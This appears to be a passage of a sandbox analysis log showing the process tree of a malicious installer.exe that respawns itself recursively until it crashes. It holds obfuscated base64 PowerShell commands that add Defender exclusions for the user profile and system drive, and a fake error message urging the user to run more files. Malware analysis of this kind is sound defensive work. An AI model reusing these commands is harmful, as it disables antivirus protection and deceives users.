        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        192⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        192⤵
        
        PID:12316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        193⤵
        
        PID:12432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        193⤵
        
        PID:12484
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        193⤵
        System Location Discovery: System Language Discovery
        
        PID:12544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        194⤵
        
        PID:12604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        194⤵
        
        PID:12708
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        194⤵
        
        PID:12760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        195⤵
        
        PID:12812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        195⤵
        
        PID:12872
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        195⤵
        System Location Discovery: System Language Discovery
        
        PID:12904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        196⤵
        
        PID:12992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        196⤵
        
        PID:13028
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        196⤵
        
        PID:13140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        197⤵
        
        PID:13220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        197⤵
        
        PID:13256
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        197⤵
        
        PID:12440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        198⤵
        
        PID:11008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        198⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        198⤵
        
        PID:12444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        199⤵
        
        PID:12552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        199⤵
        
        PID:11288
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        199⤵
        System Location Discovery: System Language Discovery
        
        PID:12572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        200⤵
        
        PID:12880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        200⤵
        
        PID:12624
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        200⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        201⤵
        
        PID:13044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        201⤵
        
        PID:13236
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        201⤵
        System Location Discovery: System Language Discovery
        
        PID:4036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        202⤵
        
        PID:11476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        202⤵
        
        PID:13100
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        202⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        203⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        203⤵
        
        PID:12296
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        203⤵
        
        PID:12672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        204⤵
        
        PID:12492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        204⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12672 -s 292
        204⤵
        Program crash
        
        PID:12904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3339086421336110116-1747397183-743414489-266334370-2012872313349452487244254373"
1⤵
PID:2664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "344409366-346053671-20425828341489695906761589132392296111333293254-1996442456"
1⤵
PID:4708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1591724415-1805598751-1640248838963224541-6992046401090303417-1624836834775077629"
1⤵
PID:5308

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1443385477689044412028058286-16119667111723502315-1949401158-262532368-1615678039"
1⤵
PID:5876

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14118984321809871887-2028060018648711579184011967-13876050761302519893-331922729"
1⤵
PID:3120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1915957621-1221787091588729458-127700301920419238517997712761353266186248431637"
1⤵
PID:4796

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "206253890621285551661704512679-21382062511963612466-1265296159316625823-1851667462"
1⤵
PID:3916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1459064039-863586655-260276966420007511-45864311624221377961593641949309593"
1⤵
PID:6036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-92575698513737947-20052629191241896840-1941101204103718285113796797541153119688"
1⤵
PID:4860

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19478569561169271243-456566670-347639326-14935923081449918234-3024527321492271493"
1⤵
PID:6060

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1412982068190813619562181047-1017512616-1706789708-1541804389-11564904701419423716"
1⤵
PID:3772

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-88971160-1368192534-123605803-12686088883589758352107867460-998745145-1781773031"
1⤵
PID:6180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-618909691-1036533761-322659126894326243-1194850465485935773-9209267011099549383"
1⤵
PID:4836

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16414331011133479644-67025497-64350913765835281-121533361-573163690-413194544"
1⤵
PID:7320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1262435084-34281508-1765046619-578840012374100834109131422819637419551583869756"
1⤵
PID:7372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1788903283-677388120-283420937-96206304094891536114805541951957961432-1015369710"
1⤵
PID:6956

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "148237720-11954570071647360428-5178063301970215029-1475753912-1273825946-1191514142"
1⤵
PID:7800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1432974240-669367749-38956946-1179063133-502242679506143889-12954150581972872640"
1⤵
PID:7456

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1747733941127844660722436472047795534714165979861960406868-411226038765153726"
1⤵
PID:7448

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-297618767143581232-1653908169-1937198661-196614664318533828187913611-1935996078"
1⤵
PID:6668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17800291451567463975-409609074843130418-20252785881493328161-890055001-1397234491"
1⤵
PID:6364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12151947942305808831329863396-2588825631450569803248709638-8150616061908388837"
1⤵
PID:7348

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1176900026205381104-9165081422104019146-897373851-3899487194771476291149671588"
1⤵
PID:8884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-990464380-1998482432827569052-453727916-1953207412203928235619792211391740150484"
1⤵
PID:4804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-942760549-287399646255306865-1488314869-1582768060-216596381-694981514-812197297"
1⤵
PID:8740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-185391609914388156701575121216-1047524038-1417229538-441742721675238055310423229"
1⤵
PID:8040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2106207364221587694-209439354-776766215-2064855422153959754016237102821477407293"
1⤵
PID:9124

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15319529001261343967551139371206611612-1817032875-936036107639343930-142756186"
1⤵
PID:9228

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3450515141300372751-1261293065-17595002141277678661-310022874-1439974766529514391"
1⤵
PID:9312

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "291431749-18268312211146799814-1658131566-1521448156294358459-1299698440-366569278"
1⤵
PID:9000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1419646323855602665-802656461-1219952168-9575288919099654315691416071071039198"
1⤵
PID:11036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-286740386-1227703624-1711489300-1992362238733577869812431873-1927612499-992385822"
1⤵
PID:10644

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4836646623158799831845814978-1662433541-794066595-18162682758926809431614709655"
1⤵
PID:11012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "810098425-19908075638779280722062957870213945801-47126969-202921552225853383"
1⤵
PID:11124

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4365729-362323660-6219111761714131207-1686338262-16586694889508156471008130082"
1⤵
PID:11684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1251016700-1249322919-595469583840971701-802299652-667422291-6436450892100900380"
1⤵
PID:12212

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6912623161295559382-251008456-1758249759-85372823020335107288697418921034979208"
1⤵
PID:12132

C:\Windows\system32\conhost.exe
